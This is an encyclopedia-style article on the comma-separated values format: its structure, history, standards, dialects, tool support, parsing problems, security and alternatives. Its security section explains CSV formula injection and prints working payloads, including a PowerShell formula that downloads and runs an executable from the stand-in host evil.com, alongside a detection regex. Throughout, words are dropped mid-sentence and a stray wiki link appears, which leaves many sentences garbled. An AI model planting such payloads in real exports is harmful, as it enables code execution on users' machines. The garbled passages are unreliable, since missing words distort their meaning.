Fact-checked by Grok 2 weeks ago

Comma-separated values

Comma-separated values (CSV) is a delimited text file format used to store tabular data, where each record consists of one or more fields separated by the comma character (,) and records are delimited by line breaks, typically CRLF (carriage return followed by line feed). The format supports an optional header row as the first line to identify field names, and fields containing commas, line breaks, or double quotes must be enclosed in double quotes, with internal double quotes escaped by doubling them. Standardized in RFC 4180 in October 2005, CSV was developed to formalize a long-existing convention for data exchange between spreadsheet programs and other applications, with the specification also registering the MIME type text/csv for consistent handling in internet protocols. Prior to formal standardization, the CSV format had been in use for decades as a simple, human-readable method for representing structured data in , originating as an early approach to in environments like early database and systems. Despite variations in implementation across tools—such as differing handling of delimiters, quoting, or encoding—RFC 4180 provides a common baseline, requiring each record to have the same number of fields and restricting characters to printable ASCII excluding certain control codes. This simplicity has made CSV ubiquitous for importing and exporting data in software like , databases such as and , and statistical tools, with institutions like the holding over 840,000 CSV files in their collections as of 2024 for preservation purposes. CSV's advantages include its nature, platform independence, and ease of parsing without specialized software, though it lacks built-in support for data types, metadata, or complex structures, often necessitating external documentation for full interpretation. Recommended by bodies like the UK Open Standards Board for tabular data publication, the format remains a for initiatives, such as those on Data.gov, due to its high adoption and transparency. While alternatives like or XML offer more features for hierarchical data, CSV's efficiency for flat, tabular datasets ensures its continued prominence in , reporting, and interoperability.

Overview

Definition

Comma-Separated Values (CSV) is a delimited text file format designed for storing and exchanging tabular data in a simple, plain-text structure. In this format, each line represents a single row of the table, with individual fields or values within the row separated by commas, and rows delimited by line breaks such as carriage return and line feed (CRLF). This approach allows CSV files to represent structured data like spreadsheets without relying on binary or proprietary encodings, making them widely portable across different systems and applications. The primary purpose of CSV is to facilitate straightforward data interchange between diverse software, including spreadsheet programs, databases, and tools, while maintaining human readability in any standard . By using only basic delimiters and line breaks, CSV avoids the need for specialized software to view or edit the content, promoting in workflows. This simplicity has made it a for data export and import in fields ranging from to scientific . CSV supports both ASCII and Unicode characters, with the format defined in terms of the US-ASCII character set by default, though files can be encoded in or other schemes to accommodate international text; however, the CSV specification includes no built-in mechanism for declaring the , which must be handled externally via types or file . For illustration, a basic CSV file might begin with a header row such as:
Name,Age,City
Alice,30,New York
Bob,25,Los Angeles
This example demonstrates how the format encodes a simple table where the first line defines column names, and subsequent lines provide corresponding values.

Basic Structure

Comma-separated values (CSV) files represent tabular data in plain text format, where each line corresponds to a record and fields within records are delimited by commas. The primary field delimiter is the comma character (,), which separates individual values in a row. Records are separated by line breaks, specifically the carriage return followed by line feed (CRLF, or %x0D %x0A in hexadecimal notation), though some implementations accept LF alone. A CSV file may include an optional header row as the first line, containing column names in the same format as data records; applications typically interpret this row as headers to label fields. All lines in the file should contain the same number of fields to maintain structural integrity, and spaces adjacent to delimiters are considered part of the field values rather than whitespace to trim. While the final record does not require a terminating , consistent use of the same line terminator throughout the file is recommended for across systems. For illustration, a simple CSV file without quoted fields might structure as follows, representing fruit inventory :
fruit,color,quantity
apple,red,1
[banana](/page/Banana),yellow,2
This example shows a header row followed by two records, each terminated by a .

History

Origins

The origins of comma-separated values (CSV) trace back to the early in mainframe environments, where the need for simple, human-readable data interchange formats emerged alongside the growth of programming languages and tools. The first documented use of a CSV-like mechanism appeared in 1972 with the FORTRAN IV (H Extended) compiler for the OS/360 operating system. This compiler introduced list-directed , a feature that allowed data entries to be separated by blanks or commas in free-form input, with successive commas indicating omitted values—for example, "5.,33.44,5.E-9/" could parse multiple numeric fields without rigid formatting. This capability simplified data entry for scientific and engineering computations on mainframes, marking an early step toward delimited text formats for tabular data transfer. During the late and early , CSV-like formats spread informally through the burgeoning personal computing and software ecosystems, driven by the demand for portable data exchange between applications. , released in 1979 as the first electronic for the , exemplified this trend by incorporating comma-separated lists in its command syntax and function arguments, such as in expressions like "@SUM(A1,B1,C1)" for aggregating values across cells. This usage facilitated basic data manipulation and import/export operations, though primarily relied on its proprietary DIF (Data Interchange Format) for file storage. Similar ad hoc delimited formats appeared in early database tools and word processors, enabling users to transfer tabular data via text files without specialized hardware, but implementations remained vendor-specific and prone to compatibility issues. The explicit term "comma-separated values" and its abbreviation "" emerged by 1983, coinciding with the rise of portable computers and bundled . The Osborne Executive, a Z80-based luggable computer released that year, included —a popular program from Sorcim—as standard software. The Osborne Executive Reference Guide documented as a for exporting data, using commas to delimit fields and newlines for records, which allowed seamless transfer to other programs like word processors or databases. This naming formalized the concept within documentation, reflecting its growing utility for non-programmers handling business and financial data. Pre-standardization implementations during this period exhibited significant variations, particularly in handling special cases that could disrupt parsing. For instance, early tools like those in and often lacked consistent quoting conventions, leaving fields containing embedded commas, quotes, or line breaks unescaped or ambiguously delimited. Without uniform rules for enclosures or escapes, data interchange frequently required manual adjustments, highlighting the format's informal, evolving nature before broader adoption.

Standardization

The standardization of comma-separated values (CSV) began in earnest in the early , as informal practices from earlier computing eras gave way to formal specifications aimed at ensuring across systems. In October 2005, the (IETF) published RFC 4180, titled "Common Format and MIME Type for Comma-Separated Values (CSV) Files," which codified CSV as an informal standard by documenting its common format and registering the "text/csv" type in accordance with RFC 2048. This document outlined specific rules for CSV files, including requirements for headers, field delimiters, quoting mechanisms, and line endings, to promote consistent and generation of CSV data without prescribing a rigid syntax. Building on this foundation, the Frictionless Data Initiative, a project of the , introduced the Table Schema specification on November 12, 2012, providing a JSON-based format for declaring schemas that add semantic to tabular data, particularly files. Table Schema enables the definition of fields, data types, constraints, and foreign keys, facilitating validation, documentation, and enhanced interoperability for datasets in ecosystems. In January 2014, the IETF extended CSV support through RFC 7111, "URI Fragment Identifiers for the text/csv Media Type," which defined mechanisms for referencing specific parts of CSV entities using URI fragments, such as rows, columns, or cells, to enable precise linking and subset extraction. Finally, in December 2015, the (W3C) released a set of recommendations under the "CSV on the Web" initiative, including the "Model for Tabular Data and Metadata on the Web" and a associated metadata vocabulary, to standardize the annotation and conversion of CSV files into richer web-accessible formats like RDF. These W3C standards emphasized integrating CSV with web architectures, supporting metadata for tabular data to improve discoverability and linkage on the .

Technical Specification

Core Rules

The core rules for comma-separated values (CSV) are defined in RFC 4180, which provides a minimal specification for the format to ensure interoperability in data interchange. A CSV file consists of one or more records, each represented as a single line delimited by a line break (CRLF); the final record may omit the line terminator. Fields within a record are delimited by commas, with each record having the same number of fields to maintain structural consistency; empty fields are indicated by two consecutive commas, as in the example name,age,city followed by a record like John,,New York representing an empty age field, or ,, for two leading empty fields in a three-field record. The first line of a CSV file, if present, serves as a header row containing field names, which subsequent data records align with positionally; this header is optional but recommended for clarity in identifying columns. For instance, a simple file might begin with ID,Name,Department on the first line, followed by data lines like 1,Alice,Engineering. CSV has no built-in or enforcement, treating all field content as unstructured strings by default, which allows flexibility but requires external validation for semantic integrity.

Handling Special Characters

In comma-separated values (CSV) files, fields that contain special characters such as commas, double quotes, or line breaks (CRLF) should be enclosed in double quotes to prevent misinterpretation during parsing. This quoting mechanism ensures that the delimiter comma is not confused with embedded commas within the data, allowing for the accurate representation of complex text values. To handle double quotes appearing inside a quoted field, the specification requires that such internal quotes be escaped by doubling them—replacing a single double quote with two consecutive double quotes. For instance, a field containing the text "He said 'hello'" would be represented as "He said ""hello"" within the CSV . This escaping rule applies only within quoted fields and preserves the original data without introducing additional delimiters. Quoting is optional for fields that do not contain commas, double quotes, or line breaks, as unquoted fields must consist solely of non-special characters to avoid parsing errors. However, for consistency and to mitigate potential issues in varied implementations, many applications quote all fields regardless. An example of a CSV record handling an embedded comma and a line break is:
"Smith, John",25,"New York, NY
with a line break"
Here, the first and third fields are quoted to enclose the comma in the name and the in the address, respectively. This approach aligns with the defined in the specification, where fields are either escaped (quoted with possible internal escapes) or non-escaped ( without special characters).

Variants and Dialects

Alternative Delimiters

While the serves as the standard delimiter for comma-separated values (CSV) files as defined in RFC 4180, various alternative delimiters are employed to address regional conventions, data content conflicts, and specific application needs. In many Western European locales, where the comma is conventionally used as a —for instance, representing π as 3,14—the (;) is adopted as the field to prevent in numerical data. This practice aligns with Excel's handling of CSV files in those regions and is implemented in tools like 's write.csv2 function, which pairs the semicolon delimiter with comma-based decimals. Tab-separated values (TSV) represent a precise variant of delimited files, utilizing the horizontal character (\t) as the separator instead of the . TSV is favored in scenarios where tabs are less likely to occur within field content, thereby minimizing the need for quoting and simplifying parsing compared to CSV. Custom dialects often incorporate the character (|) as a delimiter, particularly in and related sectors where data may frequently contain commas, semicolons, or tabs. This choice enhances readability and reduces errors in environments requiring robust separation of fields like records or details. Locale-specific adaptations further influence delimiter selection, with applications such as automatically applying the appropriate separator—such as a semicolon in settings—based on Windows regional configurations to maintain compatibility across diverse user environments.

Extensions and Metadata

To enhance the usability of comma-separated values () files beyond their basic structure, various extensions introduce for describing data semantics, validation rules, and relationships. The W3C's Metadata Vocabulary for Tabular Data, published as a recommendation in 2015, defines a JSON-based format to annotate and other tabular data with information such as field types (e.g., string, , ), constraints (e.g., minimum or maximum values), and foreign keys to link tables. This vocabulary allows to be provided in a separate , enabling processors to validate data types and infer relationships without relying solely on the raw content. Similarly, the Frictionless Data initiative's Tabular Data Package specification, developed since 2011, extends CSV by pairing it with a JSON descriptor file that outlines the schema, including field names, types, formats, and constraints. This approach uses a "sidecar" JSON file to define the structure of the accompanying CSV, promoting interoperability and automated validation in data pipelines. For instance, the specification supports detailed type definitions, such as specifying a date field with a format like "YYYY-MM-DD" to ensure consistent parsing across tools. Within the CSV on the Web (CSVW) framework, dialect descriptions provide programmatic to customize rules, including delimiters, quoting conventions, and header presence, while integrating with the broader vocabulary for semantic annotations. An example file for a containing dates might include a JSON object like { "dc:title": "Sales Data", "tableSchema": { "columns": [{ "name": "sale_date", "type": "date", "format": "YYYY-MM-DD" }] } }, which instructs processors to interpret the "sale_date" column as dates in format, preventing misinterpretation during import.

Usage and Applications

Data Interchange

Comma-separated values (CSV) files serve as a fundamental medium for data interchange due to their simplicity and broad compatibility, enabling seamless transfer of tabular data between diverse systems without requiring specialized software. This format is particularly valued in workflows involving the export of structured data from relational databases, such as SQL-based systems, where queries generate outputs for analysis or migration. For instance, database management systems like support direct export to CSV using commands like SELECT INTO OUTFILE, facilitating the movement of large datasets to spreadsheet applications for further manipulation. Conversely, spreadsheets such as or can import CSV files to populate tables, allowing users to perform ad-hoc analysis on database-derived data. This bidirectional flow underscores CSV's role in bridging enterprise with end-user tools, as it preserves tabular structure while remaining lightweight and human-readable. In , CSV excels in managing product catalogs by supporting bulk import and export operations across platforms. Systems like enable merchants to upload CSV files containing product details—including SKUs, prices, descriptions, and levels—to populate online stores efficiently, often handling thousands of items in a single operation. Similarly, B2C Commerce utilizes CSV for catalog synchronization, allowing businesses to update product listings across multiple channels without manual entry. This interchange capability reduces operational overhead in dynamic environments, where frequent updates to catalogs are essential for maintaining accurate and . Government portals leverage for disseminating , promoting transparency and public access to information. Platforms like Data.gov mandate machine-readable formats for federal datasets, with being a primary choice for tabular releases such as economic indicators or statistics, downloadable directly from agency repositories. This format's ubiquity ensures compatibility with analysis tools, enabling researchers and citizens to integrate government data into local workflows without format conversion. Internationally, similar portals, including those cataloged by Data.gov, provide exports to standardize sharing across jurisdictions. CSV integrates into web-based applications for bulk data uploads, particularly in where lists are exchanged via APIs or forms. Tools like allow users to import CSV files containing subscriber emails, names, and custom properties to segment audiences and personalize campaigns at scale. In API-driven scenarios, such as Sign's bulk send feature, CSV files define recipient details for automated document distribution, streamlining high-volume communications. This application extends to management in relationship systems, where CSV uploads facilitate rapid population of databases from external sources. In modern machine learning pipelines, facilitates dataset sharing for training and evaluation, serving as a portable format for tabular data exchange among collaborators. , for example, uses files to upload and explore datasets like transaction records, enabling preprocessing steps within cloud-based workflows. Researchers often export training data from databases or experiments into for distribution via repositories, ensuring compatibility with libraries like in for ingestion into models. This practice supports collaborative projects by allowing datasets to be versioned and shared without proprietary formats, though it requires attention to encoding for large-scale transfers.

Software Support

Spreadsheet software provides robust support for CSV files, enabling users to import, edit, and export data in this format. , a widely used tool, supports up to 1,048,576 rows and 16,384 columns per worksheet when handling CSV files, a limit consistent across versions including Excel 2016 and later. Additionally, Excel introduced native support for opening and saving CSV files in encoding starting with the 2019 version, improving handling of international characters without requiring manual encoding adjustments. , another popular option, accommodates up to 10 million cells across its spreadsheets when importing CSV data, with no strict row limit but constraints based on total cell usage to maintain performance. In programming environments, libraries facilitate efficient reading, writing, and manipulation of CSV files. Python's built-in csv module, part of the standard library since version 2.3, offers functions like csv.reader() and csv.writer() for parsing and generating CSV data, supporting dialects for varying formats and handling quoting and escaping automatically. For more advanced data analysis, the Pandas library provides high-level functions such as pd.read_csv() and to_csv(), which integrate seamlessly with DataFrames for operations like filtering, aggregation, and large-scale processing, making it a staple in data science workflows. In Java, the OpenCSV library serves as a comprehensive parser, enabling bean mapping, custom delimiters, and error handling for both reading from and writing to CSV files, with versions up to 5.x supporting modern Java features like streams. Database systems integrate CSV support for bulk data operations, streamlining import and export processes. PostgreSQL's COPY command allows efficient loading of CSV data into tables using syntax like COPY table_name FROM 'file.csv' WITH (FORMAT CSV, HEADER true), which handles quoting, escaping, and delimiters while supporting large-scale imports without row limits beyond system resources. Similarly, MySQL's LOAD DATA INFILE statement facilitates bulk CSV ingestion with options for field terminators and enclosures, as in LOAD DATA INFILE 'file.csv' INTO TABLE table_name FIELDS TERMINATED BY ',' ENCLOSED BY '"', enabling high-performance data transfer for databases handling millions of records. Cloud services have increasingly incorporated CSV handling for scalable data storage and processing as of 2025. (AWS) S3 supports files as a core component of data lakes, allowing storage of alongside tools like AWS Glue for cataloging and querying, which facilitates integration with services for petabyte-scale CSV-based workflows.

Challenges and Limitations

Parsing Issues

One common parsing issue with CSV files arises from inconsistent quoting practices, which can cause field misalignment and incorrect record boundaries. For example, if a field contains an unescaped newline character without proper quoting, parsers may interpret it as a new record separator, fragmenting a single logical row across multiple lines. The CSV specification requires that fields containing line breaks, commas, or double quotes be enclosed in double quotes, with internal double quotes escaped by doubling them (e.g., "field with ""quote"""), but many file generators—such as certain spreadsheet applications—omit quotes for fields without commas, leading to misalignment when newlines or quotes appear unexpectedly. This deviation from the rules outlined in RFC 4180 often results in errors during import into databases or analysis tools, where unquoted newlines split records erroneously. Encoding mismatches further complicate CSV parsing, as the format lacks a mandated character encoding, allowing files to be produced in diverse schemes like or legacy codepages such as (CP1252). When a parser defaults to an incorrect encoding, non-ASCII characters—such as accented letters or symbols in international data—can become corrupted, appearing as (garbled text) or replacement characters like question marks. For instance, a encoded file containing "café" read as CP1252 might render as "café," distorting the . This issue is exacerbated by tools like , which historically save CSVs using system-specific codepages rather than , and by the optional (BOM) in files, whose handling varies across parsers. To mitigate this, files should be explicitly encoded in without a BOM for broad compatibility, and parsers should allow specification of the encoding parameter. Dialect detection failures in parsing tools add another layer of difficulty, as CSV variants often use non-standard delimiters (e.g., semicolons or tabs instead of commas) or inconsistent header presence, requiring manual configuration to avoid misinterpretation. Automated detection can falter on ambiguous files, such as those with quoted fields mimicking delimiters or irregular row lengths, leading to incorrect column mapping. Best practices recommend employing standardized parsers with built-in detection mechanisms, such as Python's csv.Sniffer class, which analyzes a file sample to infer the —including , style, and header row—using heuristics like sampling up to 1024 bytes and checking for numeric versus string patterns in potential headers. Despite its utility, csv.Sniffer may require fallback to manual specification (e.g., via csv.register_dialect) for edge cases like embedded quotes or multiline fields.

Security Concerns

CSV injection, also known as formula injection, poses a significant risk in comma-separated values () files when untrusted data is embedded without proper , allowing malicious formulas to execute upon import into spreadsheet applications like or . Attackers exploit this by injecting payloads starting with characters such as =, +, -, or @, which spreadsheet software interprets as executable formulas rather than . For instance, a field containing =CMD|' /C calc'!A0 could launch the when the CSV is opened, or more dangerously, =shell|'Invoke-WebRequest "http://evil.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1 might download and execute remote . The absence of inherent schema validation in the CSV format exacerbates these vulnerabilities, as it permits unexpected data types or structures to be inserted without enforcement, potentially leading to unintended execution or during processing. Without predefined rules for field contents, applications exporting CSV files from user inputs—common in interchange scenarios—may inadvertently propagate malicious elements, enabling exploits like or system compromise when files are shared or downloaded. This lack of validation also heightens risks in environments where CSV files handle sensitive information, as attackers can manipulate inputs to bypass basic security checks. To mitigate CSV injection, developers should sanitize inputs by detecting and neutralizing dangerous characters (e.g., via regex patterns like /^[=+\-@]/) and prefixing suspect fields with a single quote (') to force text interpretation, or wrapping all fields in double quotes while escaping internal quotes. Employing secure parsers that validate data types and reject formula-like strings, combined with server-side input filtering, is essential; additionally, modern spreadsheet tools like Excel include protections such as prompts for external content and disabled (DDE) by default since 2018 updates, though users must remain vigilant against renaming files to bypass warnings. Organizations are advised to avoid exporting untrusted data directly to CSV and instead use formats with built-in validation or implement to track potential injection attempts. Real-world incidents of CSV injection have been documented in phishing campaigns since 2017, often involving malicious attachments that exploit trusted sources to deliver payloads via exported reports or logs. A notable case in involved attackers injecting formulas into activity logs, which administrators could download as CSV files and open in Excel, leading to command execution on the victim's machine; this vulnerability affected shared environments and highlighted risks for cloud-based data exports. Similar exploits have targeted web applications and reporting tools, resulting in credential theft or malware deployment, underscoring the need for proactive in data-handling workflows.

Alternatives

Comparison to Other Formats

Comma-separated values (CSV) differs from JavaScript Object Notation (JSON) primarily in its handling of data structures and compactness. While CSV excels in representing flat, tabular data without native support for nesting or explicit data types—treating all values as strings or simple numbers—JSON allows for hierarchical structures through objects and arrays, along with typed values such as booleans and nulls. This makes JSON more suitable for complex, nested data common in web APIs and configurations, whereas CSV's simplicity enhances readability for straightforward tables, such as spreadsheets. In terms of , CSV is typically more compact for flat datasets; for instance, serializing 1,000 records in CSV might require around 120,000 bytes, compared to 150,000 bytes in JSON due to the latter's key-value overhead. Compared to Extensible Markup Language (XML), CSV offers greater simplicity and reduced file size for purely tabular data, as it avoids XML's verbose tag-based syntax and metadata. XML, however, natively supports schemas like Definition (XSD) for defining structure and enabling validation, which CSV lacks entirely, making XML preferable when data integrity and complex hierarchies are required. For basic row-and-column exchanges, CSV's minimalism results in smaller files and easier manual editing, but it cannot enforce rules like required fields or data types without external tools. In contrast to columnar formats like and row-oriented , CSV prioritizes human readability through its plain-text nature but falls short in efficiency for large-scale . and employ binary encoding, compression algorithms (e.g., Snappy or Zstandard), and schema evolution, enabling significant reductions in storage—often 5-10 times smaller than uncompressed CSV—and faster analytics queries by avoiding full file scans. For example, benchmarks on data lake workloads show achieving up to 10 times the query speed of CSV for column-specific aggregations, thanks to its columnar storage that supports predicate pushdown. , while also compact and schema-rich, is better suited for streaming due to its row-based design, though both outperform CSV in big data environments like or Hadoop where compression and partial reads are critical. CSV remains the preferred choice for quick data interchanges in scenarios where human inspectability and broad compatibility outweigh the need for advanced structure or optimization, such as exporting reports from spreadsheets to databases. Its lightweight format ensures seamless integration across tools without requiring specialized libraries, ideal when simplicity accelerates workflows over performance gains from more sophisticated alternatives.

References

  1. [1]
    RFC 4180 - Common Format and MIME Type for Comma-Separated ...
    This RFC documents the format of comma separated values (CSV) files and formally registers the "text/csv" MIME type for CSV in accordance with RFC 2048.
  2. [2]
    csv — CSV File Reading and Writing — Python 3.14.0 documentation
    The so-called CSV (Comma Separated Values) format is the most common import and export format for spreadsheets and databases. CSV format was used for many years ...
  3. [3]
    CSV, Comma Separated Values (RFC 4180) - Library of Congress
    May 9, 2024 · It is a delimited data format that has fields/columns separated by the comma character %x2C (Hex 2C) and records/rows/lines separated by ...Identification and description · Sustainability factors · File type signifiers
  4. [4]
    Tabular data standard - GOV.UK
    Sep 28, 2023 · The Open Standards Board recommends the RFC 4180 definition of CSV (Comma Separated Values) for publishing tabular data in government.
  5. [5]
    CSV Files - Python Numerical Methods
    There are many scientific data are stored in the comma-separated values (CSV) file format, a delimited text file that uses a comma to separate values.
  6. [6]
    RFC 4180: Common Format and MIME Type for Comma-Separated ...
    Each record is located on a separate line, delimited by a line break (CRLF). ... The "header" parameter indicates the presence or absence of the header line.Missing: structure | Show results with:structure
  7. [7]
    [PDF] IBM FORTRAN Program Products for OS and the CMS Compo'nent ...
    A listing of IBM FORTRAN IV features not in ANS FORTRAN is also provided. Discussions of list-directed input/output, of free-form input format, and of the.
  8. [8]
    [PDF] JSON BinPack: A space-efficient schema-driven ... - Juan Cruz Viotti
    In 1983, the Osborne Executive portable computer Reference. Guide [39] used the term CSV to refer to files containing comma-separated rows of data. In 1984 ...
  9. [9]
    Table Schema | Data Package (v1)
    Table Schema is a simple, language-agnostic format to declare a schema for tabular data, represented by a JSON object with a 'fields' property.
  10. [10]
    RFC 7111 - URI Fragment Identifiers for the text/csv Media Type
    This memo defines URI fragment identifiers for text/csv MIME entities. These fragment identifiers make it possible to refer to parts of a text/csv MIME entity ...
  11. [11]
    RFC 4180 Common Format and MIME Type for CSV Files - IETF
    This RFC documents the format of comma separated values (CSV) files and formally registers the "text/csv" MIME type for CSV in accordance with RFC 2048 [1].
  12. [12]
  13. [13]
    Excel changes my delimiter in CSV although my regional as well as ...
    Mar 13, 2023 · In European countries, to change the delimiter fromsemicolon to comma, you also should uncheck the Use system separators box. Then set the ...
  14. [14]
    CS 304 CSV files - Computer Science
    In my opinion, TSV is much better than CSV, both because it's easier to get output from MySQL, but also because it's much easier for programs like Excel and ...Missing: advantages | Show results with:advantages
  15. [15]
    Exporting Data - Data Carpentry
    May 22, 2025 · Try tab-delimited (tab separated values or TSV) or comma-delimited (comma separated values or CSV). The advantage of a CSV file over an Excel/ ...
  16. [16]
    Setting Up Invoice Formats - Thomson Reuters
    : In a pipe-delimited file, all fields are separated by a vertical pipe character. For example, a line in a pipe-delimited file would appear as: CompanyName | ...<|separator|>
  17. [17]
    Import or export text (.txt or .csv) files - Microsoft Support
    ... csv file, the default list separator (delimiter) is a comma. You can change this to another separator character using Windows Region settings. Caution ...
  18. [18]
    Metadata Vocabulary for Tabular Data - W3C
    Dec 17, 2015 · This document defines a vocabulary for metadata that annotates tabular data. This can be used to provide metadata at various levels, from groups of tables and ...
  19. [19]
    Tabular Data Package
    Tabular Data Package is a simple container format used for publishing and sharing tabular-style data. The format's focus is on simplicity and ease of use, ...
  20. [20]
    Excel specifications and limits - Microsoft Support
    In Excel 2010, the maximum worksheet size is 1048576 rows by 16384 columns. In this article, find all workbook, worksheet, and feature specifications and ...
  21. [21]
    What's new in Excel 2019 for Windows - Microsoft Support
    You can now open and save CSV files that use UTF-8 character encoding. Go to File > Save As > Browse. Then click the Save as type menu, and you'll find the new ...
  22. [22]
    Files you can store in Google Drive
    Up to 10 million cells or 18,278 columns for spreadsheets imported from Microsoft Excel. The limits are the same for Excel and CSV imports.
  23. [23]
    pandas.read_csv — pandas 2.3.3 documentation - PyData |
    Read a comma-separated values (csv) file into DataFrame. Also supports optionally iterating or breaking of the file into chunks.
  24. [24]
    opencsv –
    Jul 26, 2025 · Opencsv is an easy-to-use CSV (comma-separated values) parser library for Java. It was developed because all the CSV parsers at the time didn't have commercial ...Opencsv download · Dependency Information · Project Licenses · Opencsv Source
  25. [25]
    Documentation: 18: COPY - PostgreSQL
    COPY TO copies the contents of a table to a file, while COPY FROM copies data from a file to a table (appending the data to whatever is in the table already).
  26. [26]
  27. [27]
    Amazon S3 as the data lake storage platform
    You can store structured data (such as relational data), semi-structured data (such as JSON, XML, and CSV files), and unstructured data (such as images or media ...
  28. [28]
    draft-shafranovich-rfc4180-bis-03 - IETF Datatracker
    Sep 14, 2022 · This RFC documents the common format used for Comma-Separated Values (CSV) files and updates the associated MIME type "text/csv".
  29. [29]
  30. [30]
    CSV Injection - OWASP Foundation
    Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website.Missing: concerns | Show results with:concerns
  31. [31]
    CWE-1236: Improper Neutralization of Formula Elements in a CSV File
    The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements.
  32. [32]
    Data Extraction to Command Execution CSV Injection - Veracode
    Jun 14, 2023 · CSV injection is a side effect of bad input validation, and other types of web attacks are due to weak input validation.Missing: concerns | Show results with:concerns
  33. [33]
    Is that CSV secure? - Fluid Attacks
    Comma-Separated Values file is a common extension in data files used in several application fields. Here we present a CSV vulnerability most people ignore.Missing: concerns | Show results with:concerns
  34. [34]
    Preventing CSV Injection - Information Security Stack Exchange
    Oct 29, 2024 · I am creating an application that takes information from another system and writes reports in CSV format. I am trying to mitigate CSV Injection vulnerabilities ...<|control11|><|separator|>
  35. [35]
    Cloud Security Risks (Part 1): Azure CSV Injection Vulnerability
    Microsoft Azure is vulnerable to CSV injection, misconfigurations and security exploits. Is your Cloud at risk? Review the technical details.Background: Csv Formula... · Attack Narrative · Real World Attack Scenario
  36. [36]
    An Extensive Study on Text Serialization Formats and Methods - arXiv
    May 10, 2025 · For data with significant nesting or complex relationships, JSON, YAML, or XML are generally more appropriate than CSV. The choice between JSON, ...
  37. [37]
    CSV vs JSON vs XML - The Best Comparison Guide 2025 - Sonra
    Sep 25, 2024 · CSV files can represent large datasets in a more compact form than JSON and XML, allowing for smaller files. CSV files work well with Microsoft ...
  38. [38]
    CSV vs. Parquet vs. AVRO: Pick the Optimal Format for Your Data ...
    Jan 22, 2025 · CSV, Parquet, and AVRO are the top contenders. Each has strengths. Each has weaknesses. Pick the wrong one and risk slow queries, bloated storage, or painful ...
  39. [39]
    CSV vs Excel: Making the Right Choice for Your Data Projects
    Jun 21, 2024 · Use CSV: Use CSV when you need a lightweight, universally compatible format for straightforward data exchange between different systems and ...